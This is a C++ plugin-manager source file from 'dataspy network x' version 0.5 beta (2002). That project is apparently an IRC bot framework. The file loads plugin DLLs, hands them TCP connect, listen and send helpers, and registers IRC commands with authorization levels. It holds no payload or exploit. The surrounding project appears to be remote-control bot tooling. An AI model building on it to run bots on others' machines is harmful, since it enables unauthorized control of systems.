 /*	
	dataspy network x version 0.5 beta
	Copyright (C) 2002 dataspy dot net INC

	This program is free software; you can redistribute it and/or
	modify it under the terms of the GNU General Public License
	as published by the Free Software Foundation; either version 2
	of the License, or (at your option) any later version.

	This program is distributed in the hope that it will be useful,
	but WITHOUT ANY WARRANTY; without even the implied warranty of
	MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
	GNU General Public License for more details.

	You should have received a copy of the GNU General Public License
	along with this program; if not, write to the Free Software
	Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
  */

 /*

	pluginmanager.cpp - Looks after plugins

	Last revised : 31st March 2002

  */




#include <windows.h>
#include "../include/shared.h"
#include "../include/tcp.h"
#include "../include/dsnxsockets.h"
#include "../include/commands.h"
#include "../include/nickdb.h"
#include "../include/Clinkedlists.h"
#include "../include/pluginmanager.h"
#include "../include/mainbot.h"
#include "../include/dsnxsockets.h"

CLinkedList *g_Plugins = 0;


void mfree( void *memblock,int del) {
	
	if (del == 0) 
		free(memblock);
	else
		delete memblock;
}

bool IsValidSock(void *pointer) {

	if (g_IOList == 0)
		return false;

	CLinkedList *list =g_IOList;

	do {

		if (list == pointer)
			return true;

		list = list->Get (1);



	} while (list != g_IOList);

	return false;


}

void SendMsgFromMainbot(void *bot,char *message,char *to,char *where,bool Error) {

	if (IsValidSock(bot)) {

		((MainBot*)(bot))->SendIRCMessage (message,to,where,Error);

	}


}


void InitExports(DSNXExports*exports) {

	exports->AddPluginCmd			= AddPluginCmd;
	exports->IsValidSock			= IsValidSock;
	exports->Random					= Random;
	exports->RandomText				= RandomText;
	exports->SmartConnect			= SmartConnect;

	exports->TCPAccept				= TCPAccept;
	exports->TCPConnect				= TCPConnect;
	exports->TCPListen				= TCPListen;
	exports->TCPRecv				= TCPRecv;
	exports->TCPSend				= TCPSend;

	exports->SendMsgFromMainbot	= SendMsgFromMainbot;
	
	///*
	//		11				-Make sure we initalize them all
	//*

}

char LoadName[] = "_PluginLoad";

USHORT AddPlugins(const char *files)
{
	WIN32_FIND_DATA found;
	USHORT count =0;
	HANDLE hFile;
	HINSTANCE lib;
	DSNXPluginReturn Return;
	DSNXExports exports;
	PluginStartup pStartup;

	InitExports(&exports);
	
	if((hFile =FindFirstFile(files,&found)) != INVALID_HANDLE_VALUE) {
		
		do {

			lib = LoadLibrary(found.cFileName);
			
			if (lib) {

				pStartup = (PluginStartup)GetProcAddress(lib,LoadName+1);	//* without underscore 

				if (!pStartup) {

					pStartup = (PluginStartup)GetProcAddress(lib,LoadName);		//* with underscore 

				}

				if (pStartup) {

					if(	pStartup(&exports,&Return)) {

						if (g_Plugins != 0) {
							if (g_Plugins->Get(Return.plugin_name) != 0) {
							
								//* Plugin by this name already exists! 

								//Return.Unload();
								FreeLibrary(lib);
								continue;
							}

						} 

						DSNXPlugin *plugin = new DSNXPlugin(Return.plugin_name,Return.Unload,lib);

						plugin->Insert (&g_Plugins);
						Return.Load();
						count++;
											
					}
					else
						FreeLibrary(lib);
				}
				else
					FreeLibrary(lib);
			}

		} while (FindNextFile(hFile,&found));
	} 
	
	return count;

}


bool AddPluginCmd(char *cid,DSNX_Command command,USHORT auth_lvl,char *plugin_name) {

	if (g_Plugins == 0)
		return false;

	if (g_CommandList != 0) {
		if(g_CommandList->Get(cid)) {
			return false;
		}
	}
	CLinkedList *plugin;	
	if (g_Plugins != 0) {
		if ( (plugin=g_Plugins->Get(plugin_name)) == 0) {
			return false;
		}
	}

	DSNXCommand *cmd = new DSNXCommand(cid,auth_lvl,command);
	cmd->Insert (&g_CommandList);

	PluginTracker *tracker = new PluginTracker(cmd);
	tracker->Insert (&((DSNXPlugin*)plugin)->InstalledCommands);

	return true;
}


bool UnloadPlugin(char *name) {

	if (g_Plugins == 0)
		return false;

	CLinkedList *plugin_ll = g_Plugins->Get(name);

	delete plugin_ll;

	return true;	

}

void UnloadPlugins(void) {

	if (g_Plugins == 0)
		return;

	CLinkedList *plugin_ll = g_Plugins->Get(1);

	while (plugin_ll) {

		delete plugin_ll;

		if (g_Plugins == 0)
			break;

		plugin_ll = g_Plugins->Get(1);
	}
}

DSNXPlugin::DSNXPlugin(char *named,pPluginAction ppRemove,HINSTANCE hLibrary) : CLinkedList(named) {

	InstalledCommands =0;
	pRemove = ppRemove;
	library = hLibrary;

}

DSNXPlugin::~DSNXPlugin(){

	if (InstalledCommands != 0) {

		CLinkedList *command_ll = InstalledCommands->Get(1);

		while (command_ll) {

			command_ll->Remove (&InstalledCommands);

			delete command_ll;

			if (InstalledCommands == 0 )
				break;

			command_ll = InstalledCommands->Get(1);

		}
	}

	pRemove ();
	FreeLibrary(library);		
	Remove(&g_Plugins);

}


PluginTracker::PluginTracker(DSNXCommand *command) : CLinkedList (0) {

	cmd = command;

}

PluginTracker::~PluginTracker() {

	cmd->Remove(&g_CommandList);

}